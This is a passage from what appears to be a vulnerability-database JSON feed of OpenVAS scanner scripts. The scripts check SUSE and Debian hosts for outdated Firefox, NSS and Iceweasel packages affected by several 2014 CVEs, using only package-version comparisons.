rpm:\"mozilla-nss-tools~3.17.3~0.3.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-32bit\", rpm:\"libfreebl3-32bit~3.17.3~0.3.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-32bit\", rpm:\"mozilla-nss-32bit~3.17.3~0.3.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES11.0SP1\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~31.4.0esr~0.3.1\", rls:\"SLES11.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~31.4.0esr~0.3.1\", rls:\"SLES11.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3\", rpm:\"libfreebl3~3.17.3~0.3.1\", rls:\"SLES11.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss\", rpm:\"mozilla-nss~3.17.3~0.3.1\", rls:\"SLES11.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools\", rpm:\"mozilla-nss-tools~3.17.3~0.3.1\", rls:\"SLES11.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-32bit\", rpm:\"libfreebl3-32bit~3.17.3~0.3.1\", rls:\"SLES11.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-32bit\", rpm:\"mozilla-nss-32bit~3.17.3~0.3.1\", rls:\"SLES11.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:38:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-13T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for Mozilla (SUSE-SU-2015:0180-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-1569", "CVE-2014-8638"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850755", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850755", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850755\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 14:46:39 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-1569\", \"CVE-2014-8634\", \"CVE-2014-8636\", \"CVE-2014-8637\",\n \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Mozilla (SUSE-SU-2015:0180-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Mozilla'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and\n security issues.\n\n Mozilla NSS has been updated to 3.17.3, fixing a security issue and\n updating the root certificate list.\n\n Security Issues:\n\n * CVE-2014-1569\n\n * CVE-2014-8634\n\n * CVE-2014-8639\n\n * CVE-2014-8641\n\n * CVE-2014-8638\n\n * CVE-2014-8636\n\n * CVE-2014-8637\n\n * CVE-2014-8640\");\n\n script_tag(name:\"affected\", value:\"Mozilla on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:0180-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox\", rpm:\"MozillaFirefox~31.4.0esr~0.8.7\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"MozillaFirefox-translations\", rpm:\"MozillaFirefox-translations~31.4.0esr~0.8.7\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3\", rpm:\"libfreebl3~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3\", rpm:\"libsoftokn3~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss\", rpm:\"mozilla-nss~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-tools\", rpm:\"mozilla-nss-tools~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-32bit\", rpm:\"libfreebl3-32bit~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-32bit\", rpm:\"libsoftokn3-32bit~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-32bit\", rpm:\"mozilla-nss-32bit~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libfreebl3-x86\", rpm:\"libfreebl3-x86~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsoftokn3-x86\", rpm:\"libsoftokn3-x86~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mozilla-nss-x86\", rpm:\"mozilla-nss-x86~3.17.3~0.8.11\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:53:49", "description": "Multiple security issues have been found\nin Iceweasel, Debian", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3127-1 (iceweasel - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703127", "href": "http://plugins.openvas.org/nasl.php?oid=703127", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3127.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3127-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703127);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8641\");\n script_name(\"Debian Security Advisory DSA 3127-1 (iceweasel - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-01-14 00:00:00 +0100 (Wed, 14 Jan 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3127.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"iceweasel on Debian Linux\");\n script_tag(name: \"insight\", value: \"Iceweasel is Firefox, rebranded. It is\na powerful, extensible web browser with support for modern web application\ntechnologies.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 31.4.0esr-1~deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 31.4.0esr-1.\n\nWe recommend that you upgrade your iceweasel packages.\");\n script_tag(name: \"summary\", value: \"Multiple security issues have been found\nin Iceweasel, Debian's version of the Mozilla Firefox web browser: Multiple memory\nsafety errors and implementation errors may lead to the execution of arbitrary code,\ninformation leaks or denial of service.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"iceweasel\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-dbg\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-dev\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-as\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-bd\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bn-in\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-csb\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-cy\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-da\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-de\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-el\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-gb\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-en-za\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-eo\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-ar\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-cl\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-es\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-es-mx\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-et\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-eu\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fa\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ff\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fi\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fr\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-fy-nl\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ga-ie\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gd\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gl\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-gu-in\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-he\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hi-in\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hr\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hsb\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hu\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-hy-am\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-id\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-is\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-it\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ja\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-kk\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-km\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-kn\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ko\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ku\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lij\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lt\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-lv\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mai\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mk\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"iceweasel-l10n-zu\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozjs17d\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libmozjs17d-dbg\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-17.0\", ver:\"31.4.0esr-1~deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xulrunner-17.0-dbg\", 